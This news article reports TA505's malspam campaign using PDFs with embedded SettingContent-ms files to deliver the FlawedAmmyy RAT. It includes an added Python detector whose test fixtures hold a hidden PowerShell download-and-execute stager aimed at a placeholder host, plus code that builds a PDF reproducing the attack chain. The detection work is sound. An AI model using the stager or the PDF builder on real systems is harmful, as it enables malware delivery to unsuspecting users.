
TA505 gang abusing PDF files embedding SettingContent-ms to distribute FlawedAmmyy RAT

Proofpoint uncovered a massive malspam campaign leveraging emails delivering weaponized PDF documents containing malicious SettingContent-ms files.

Security experts from Proofpoint have uncovered a massive malspam campaign in which crooks sent hundreds of thousands of emails delivering weaponized PDF documents with embedded malicious SettingContent-ms files.

Experts attributed the malspam campaign to the cybercriminal group tracked as TA505; the attackers are spreading the FlawedAmmyy RAT.

The SettingContent-ms file format was introduced in Windows 10 and allows a user to create "shortcuts" to various Windows 10 settings pages.

A legitimate SettingContent-ms file opens the Control Panel for the user by launching control.exe; experts noticed that the schema includes a <DeepLink> element.


This element takes any binary with parameters and executes it. An attacker can therefore replace 'control.exe' with any other command, including cmd.exe or PowerShell, and have it run as soon as the file is opened, without further user interaction.

“After countless hours reading file specifications, I stumbled across the “.SettingContent-ms” file type. This format was introduced in Windows 10 and allows a user to create “shortcuts” to various Windows 10 setting pages. These files are simply XML and contain paths to various Windows 10 settings binaries.” wrote experts from Specterops.

“The interesting aspect of this file is the <DeepLink> element in the schema. This element takes any binary with parameters and executes it. What happens if we simply substitute “control.exe” to something like “cmd.exe /c calc.exe”?”

Experts noticed that a malicious SettingContent-ms file can bypass Windows 10 security mechanisms such as Attack Surface Reduction (ASR) and the detection of OLE-embedded dangerous file formats.

In June, experts from SpecterOps published research on abusing the SettingContent-ms file format embedded in Microsoft Word documents; only a few days ago Proofpoint experts observed threat actors leveraging PDF documents instead.

“Colleagues at SpecterOps recently published research[1] on abuse of the SettingContent-ms file format. Crafted SettingContent-ms files can be used to bypass certain Windows 10 defenses such as Attack Surface Reduction (ASR) and detection of OLE-embedded dangerous file formats.” reads the analysis published by Proofpoint.

“We first observed an actor embedding SettingContent-ms inside a PDF on June 18. However, on July 16 we observed a particularly large campaign with hundreds of thousands of messages attempting to deliver PDF attachments with an embedded SettingContent-ms file.”


Once the victim opens the PDF, Adobe Reader displays a warning asking whether to open the file, because the document's JavaScript attempts to run the embedded "downl.SettingContent-ms". Experts noticed that this prompt is shown for any file format embedded within a PDF and is not specific to SettingContent-ms files.

If the victim clicks "OK", the PowerShell command included in the <DeepLink> element downloads and executes the FlawedAmmyy RAT.
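The chain described above (a PDF carrying an embedded SettingContent-ms file, JavaScript that asks Reader to open it, and a <DeepLink> that launches an arbitrary command) is easy to triage without opening the document. The following Python is an added example, not code from Proofpoint, SpecterOps or the campaign: it pulls embedded file streams out of a raw PDF, parses any SettingContent-ms payload it finds and reports which program the DeepLink would launch. The PDF objects, the launcher script and both XML documents are constructed samples; the element names follow the format SpecterOps describes, while the schema namespace URI, the AppID, the PowerShell stager text and the allowlist of legitimate launch targets are assumptions.

```python
"""Triage for the PDF -> SettingContent-ms -> <DeepLink> chain (added example;
every input built below is a constructed sample, see the lead-in)."""
import re
import zlib
import xml.etree.ElementTree as ET

ALLOWED_LAUNCHERS = {"control.exe", "systemsettings.exe"}   # assumed allowlist
SUSPICIOUS_TOKENS = ("cmd.exe", "powershell", "mshta", "wscript", "cscript",
                     "rundll32", "certutil", "bitsadmin")

def deep_link_of(xml: bytes) -> str:
    """Text of the first <DeepLink> element, whatever namespace it sits in."""
    for el in ET.fromstring(xml).iter():
        if el.tag.rsplit("}", 1)[-1] == "DeepLink":
            return (el.text or "").strip()
    return ""

def deep_link_verdict(xml) -> dict:
    """Classify a SettingContent-ms document by the program its DeepLink launches."""
    if isinstance(xml, str):
        xml = xml.encode("utf-8")
    link = deep_link_of(xml)
    # First token is the program, the rest are parameters (quoted paths with spaces not handled).
    program = link.split()[0].strip('"') if link else ""
    launcher = program.replace("/", "\\").rsplit("\\", 1)[-1].lower()
    tokens = [t for t in SUSPICIOUS_TOKENS if t in link.lower()]
    return {"deep_link": link, "launcher": launcher, "suspicious": tokens,
            "malicious": bool(link) and (launcher not in ALLOWED_LAUNCHERS or bool(tokens))}

NAME_RE = re.compile(rb"/(?:UF|F)\s*\(([^)]*)\)")          # /F (name) inside a Filespec
EMBEDDED_RE = re.compile(rb"/Type\s*/EmbeddedFile\b")
STREAM_RE = re.compile(rb"stream\r?\n")
LENGTH_RE = re.compile(rb"/Length\s+(\d+)(?!\s+\d+\s+R)")   # direct /Length values only
JS_RE = re.compile(rb"/(?:JavaScript|JS)\b")
LAUNCH_RE = re.compile(rb"exportDataObject|/Launch\b")

def embedded_streams(pdf: bytes):
    """Yield the decoded bytes of every /EmbeddedFile stream in a raw PDF."""
    for obj in pdf.split(b"endobj"):
        hdr = STREAM_RE.search(obj)
        if hdr is None or not EMBEDDED_RE.search(obj[:hdr.start()]):
            continue
        dictionary = obj[:hdr.start()]
        length = LENGTH_RE.search(dictionary)
        if length:
            data = obj[hdr.end():hdr.end() + int(length.group(1))]
        else:  # indirect /Length: fall back to the end marker
            data = obj[hdr.end():].split(b"endstream", 1)[0].rstrip(b"\r\n")
        yield zlib.decompress(data) if b"/FlateDecode" in dictionary else data

def triage_pdf(pdf: bytes) -> dict:
    """Flag a PDF that embeds a SettingContent-ms file and carries launch logic."""
    names = sorted({n.decode("latin-1") for n in NAME_RE.findall(pdf)})
    setting_files = [n for n in names if n.lower().endswith(".settingcontent-ms")]
    verdicts = [deep_link_verdict(d) for d in embedded_streams(pdf) if b"<DeepLink" in d]
    return {"embedded_names": names, "settingcontent_names": setting_files,
            "has_javascript": JS_RE.search(pdf) is not None,
            "has_launch": LAUNCH_RE.search(pdf) is not None, "deep_links": verdicts,
            "malicious": bool(setting_files) or any(v["malicious"] for v in verdicts)}

# --- constructed samples (format modelled on the real file; AppID and namespace assumed) ---
BENIGN_XML = """<?xml version="1.0" encoding="UTF-8"?>
<PCSettings>
  <SearchableContent xmlns="http://schemas.microsoft.com/Search/2013/SettingContent">
    <ApplicationInformation>
      <AppID>windows.immersivecontrolpanel_cw5n1h2txyewy!microsoft.windows.immersivecontrolpanel</AppID>
      <DeepLink>%windir%\\system32\\control.exe /name Microsoft.SystemSettings</DeepLink>
      <Icon>%windir%\\system32\\control.exe</Icon>
    </ApplicationInformation>
  </SearchableContent>
</PCSettings>"""
# Same file with the DeepLink hijacked, in the spirit of the "cmd.exe /c calc.exe" PoC;
# the PowerShell stager and its URL are made up for this example.
EVIL_XML = BENIGN_XML.replace(
    "%windir%\\system32\\control.exe /name Microsoft.SystemSettings",
    "cmd.exe /c powershell -nop -w hidden -c \"IEX (New-Object Net.WebClient)"
    ".DownloadString('http://example.invalid/stage')\"")
# Hypothetical launcher script (not the campaign's): exportDataObject saves the embedded
# file and asks Reader to open it, which is what raises the "open this file?" prompt.
SAMPLE_JS = 'this.exportDataObject({cName: "downl.SettingContent-ms", nLaunch: 2});'

def build_sample_pdf(setting_xml: str, js: str) -> bytes:
    """Minimal PDF with one Flate-compressed embedded file and an OpenAction script."""
    payload = zlib.compress(setting_xml.encode("utf-8"))
    objs = [
        b"<< /Type /Catalog /Names << /EmbeddedFiles << /Names "
        b"[(downl.SettingContent-ms) 2 0 R] >> >> /OpenAction 4 0 R >>",
        b"<< /Type /Filespec /F (downl.SettingContent-ms) /EF << /F 3 0 R >> >>",
        b"<< /Type /EmbeddedFile /Filter /FlateDecode /Length %d >>\nstream\n" % len(payload)
        + payload + b"\nendstream",
        b"<< /S /JavaScript /JS (" + js.encode("utf-8") + b") >>",
    ]
    body = b"%PDF-1.7\n"
    for num, obj in enumerate(objs, 1):
        body += b"%d 0 obj\n" % num + obj + b"\nendobj\n"
    return body + b"trailer\n<< /Root 1 0 R >>\n%%EOF\n"
```

To run it against a real attachment, pass `open(path, "rb").read()` to `triage_pdf` instead of the constructed sample. The parser reads plain and Flate-encoded stream objects only; files that pack their objects into /ObjStm containers or use indirect /Length values need a full PDF library. Note that any PDF naming a `.SettingContent-ms` attachment is flagged even when the DeepLink looks benign, since there is no legitimate reason to ship that file type inside a document.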

The FlawedAmmyy RAT has been active since 2016 and is based on the leaked source code of the Ammyy Admin remote administration tool.

FlawedAmmyy implements common backdoor features: it allows attackers to manage files, capture the screen, remotely control the machine, establish RDP sessions, and much more.

Experts attributed the malspam campaign to the TA505 threat actor based on the email messages as well as the payload.

TA505 operates on a large scale; it was behind other major campaigns leveraging the Necurs botnet to deliver malware including the Locky ransomware, the Jaff ransomware, and the Dridex banking Trojan.

“Whether well established (like TA505) or newer to the space, attackers are quick to adopt new techniques and approaches when malware authors and researchers publish new proofs of concept. While not all new approaches gain traction, some may become regular elements through which threat actors rotate as they seek new means of distributing malware or stealing credentials for financial gain.” concludes Proofpoint researchers, “In this case, we see TA505 acting as an early adopter, adapting the abuse of SettingContent-ms files to a PDF-based attack delivered at significant scale.”


Pierluigi Paganini

(Security Affairs – TA505 ,  SettingContent-ms file)


Pierluigi Paganini is member of the ENISA (European Union Agency for Network and Information Security) Threat Landscape Stakeholder Group and Cyber G7 Group, he is also a Security Evangelist, Security Analyst and Freelance Writer. Editor-in-Chief at "Cyber Defense Magazine", Pierluigi is a cyber security expert with over 20 years experience in the field, he is Certified Ethical Hacker at EC Council in London. The passion for writing and a strong belief that security is founded on sharing and awareness led Pierluigi to find the security blog "Security Affairs" recently named a Top National Security Resource for US. Pierluigi is a member of the "The Hacker News" team and he is a writer for some major publications in the field such as Cyber War Zone, ICTTF, Infosec Island, Infosec Institute, The Hacker News Magazine and for many other Security magazines. Author of the Books "The Deep Dark Web" and “Digital Virtual Currency and Bitcoin”.
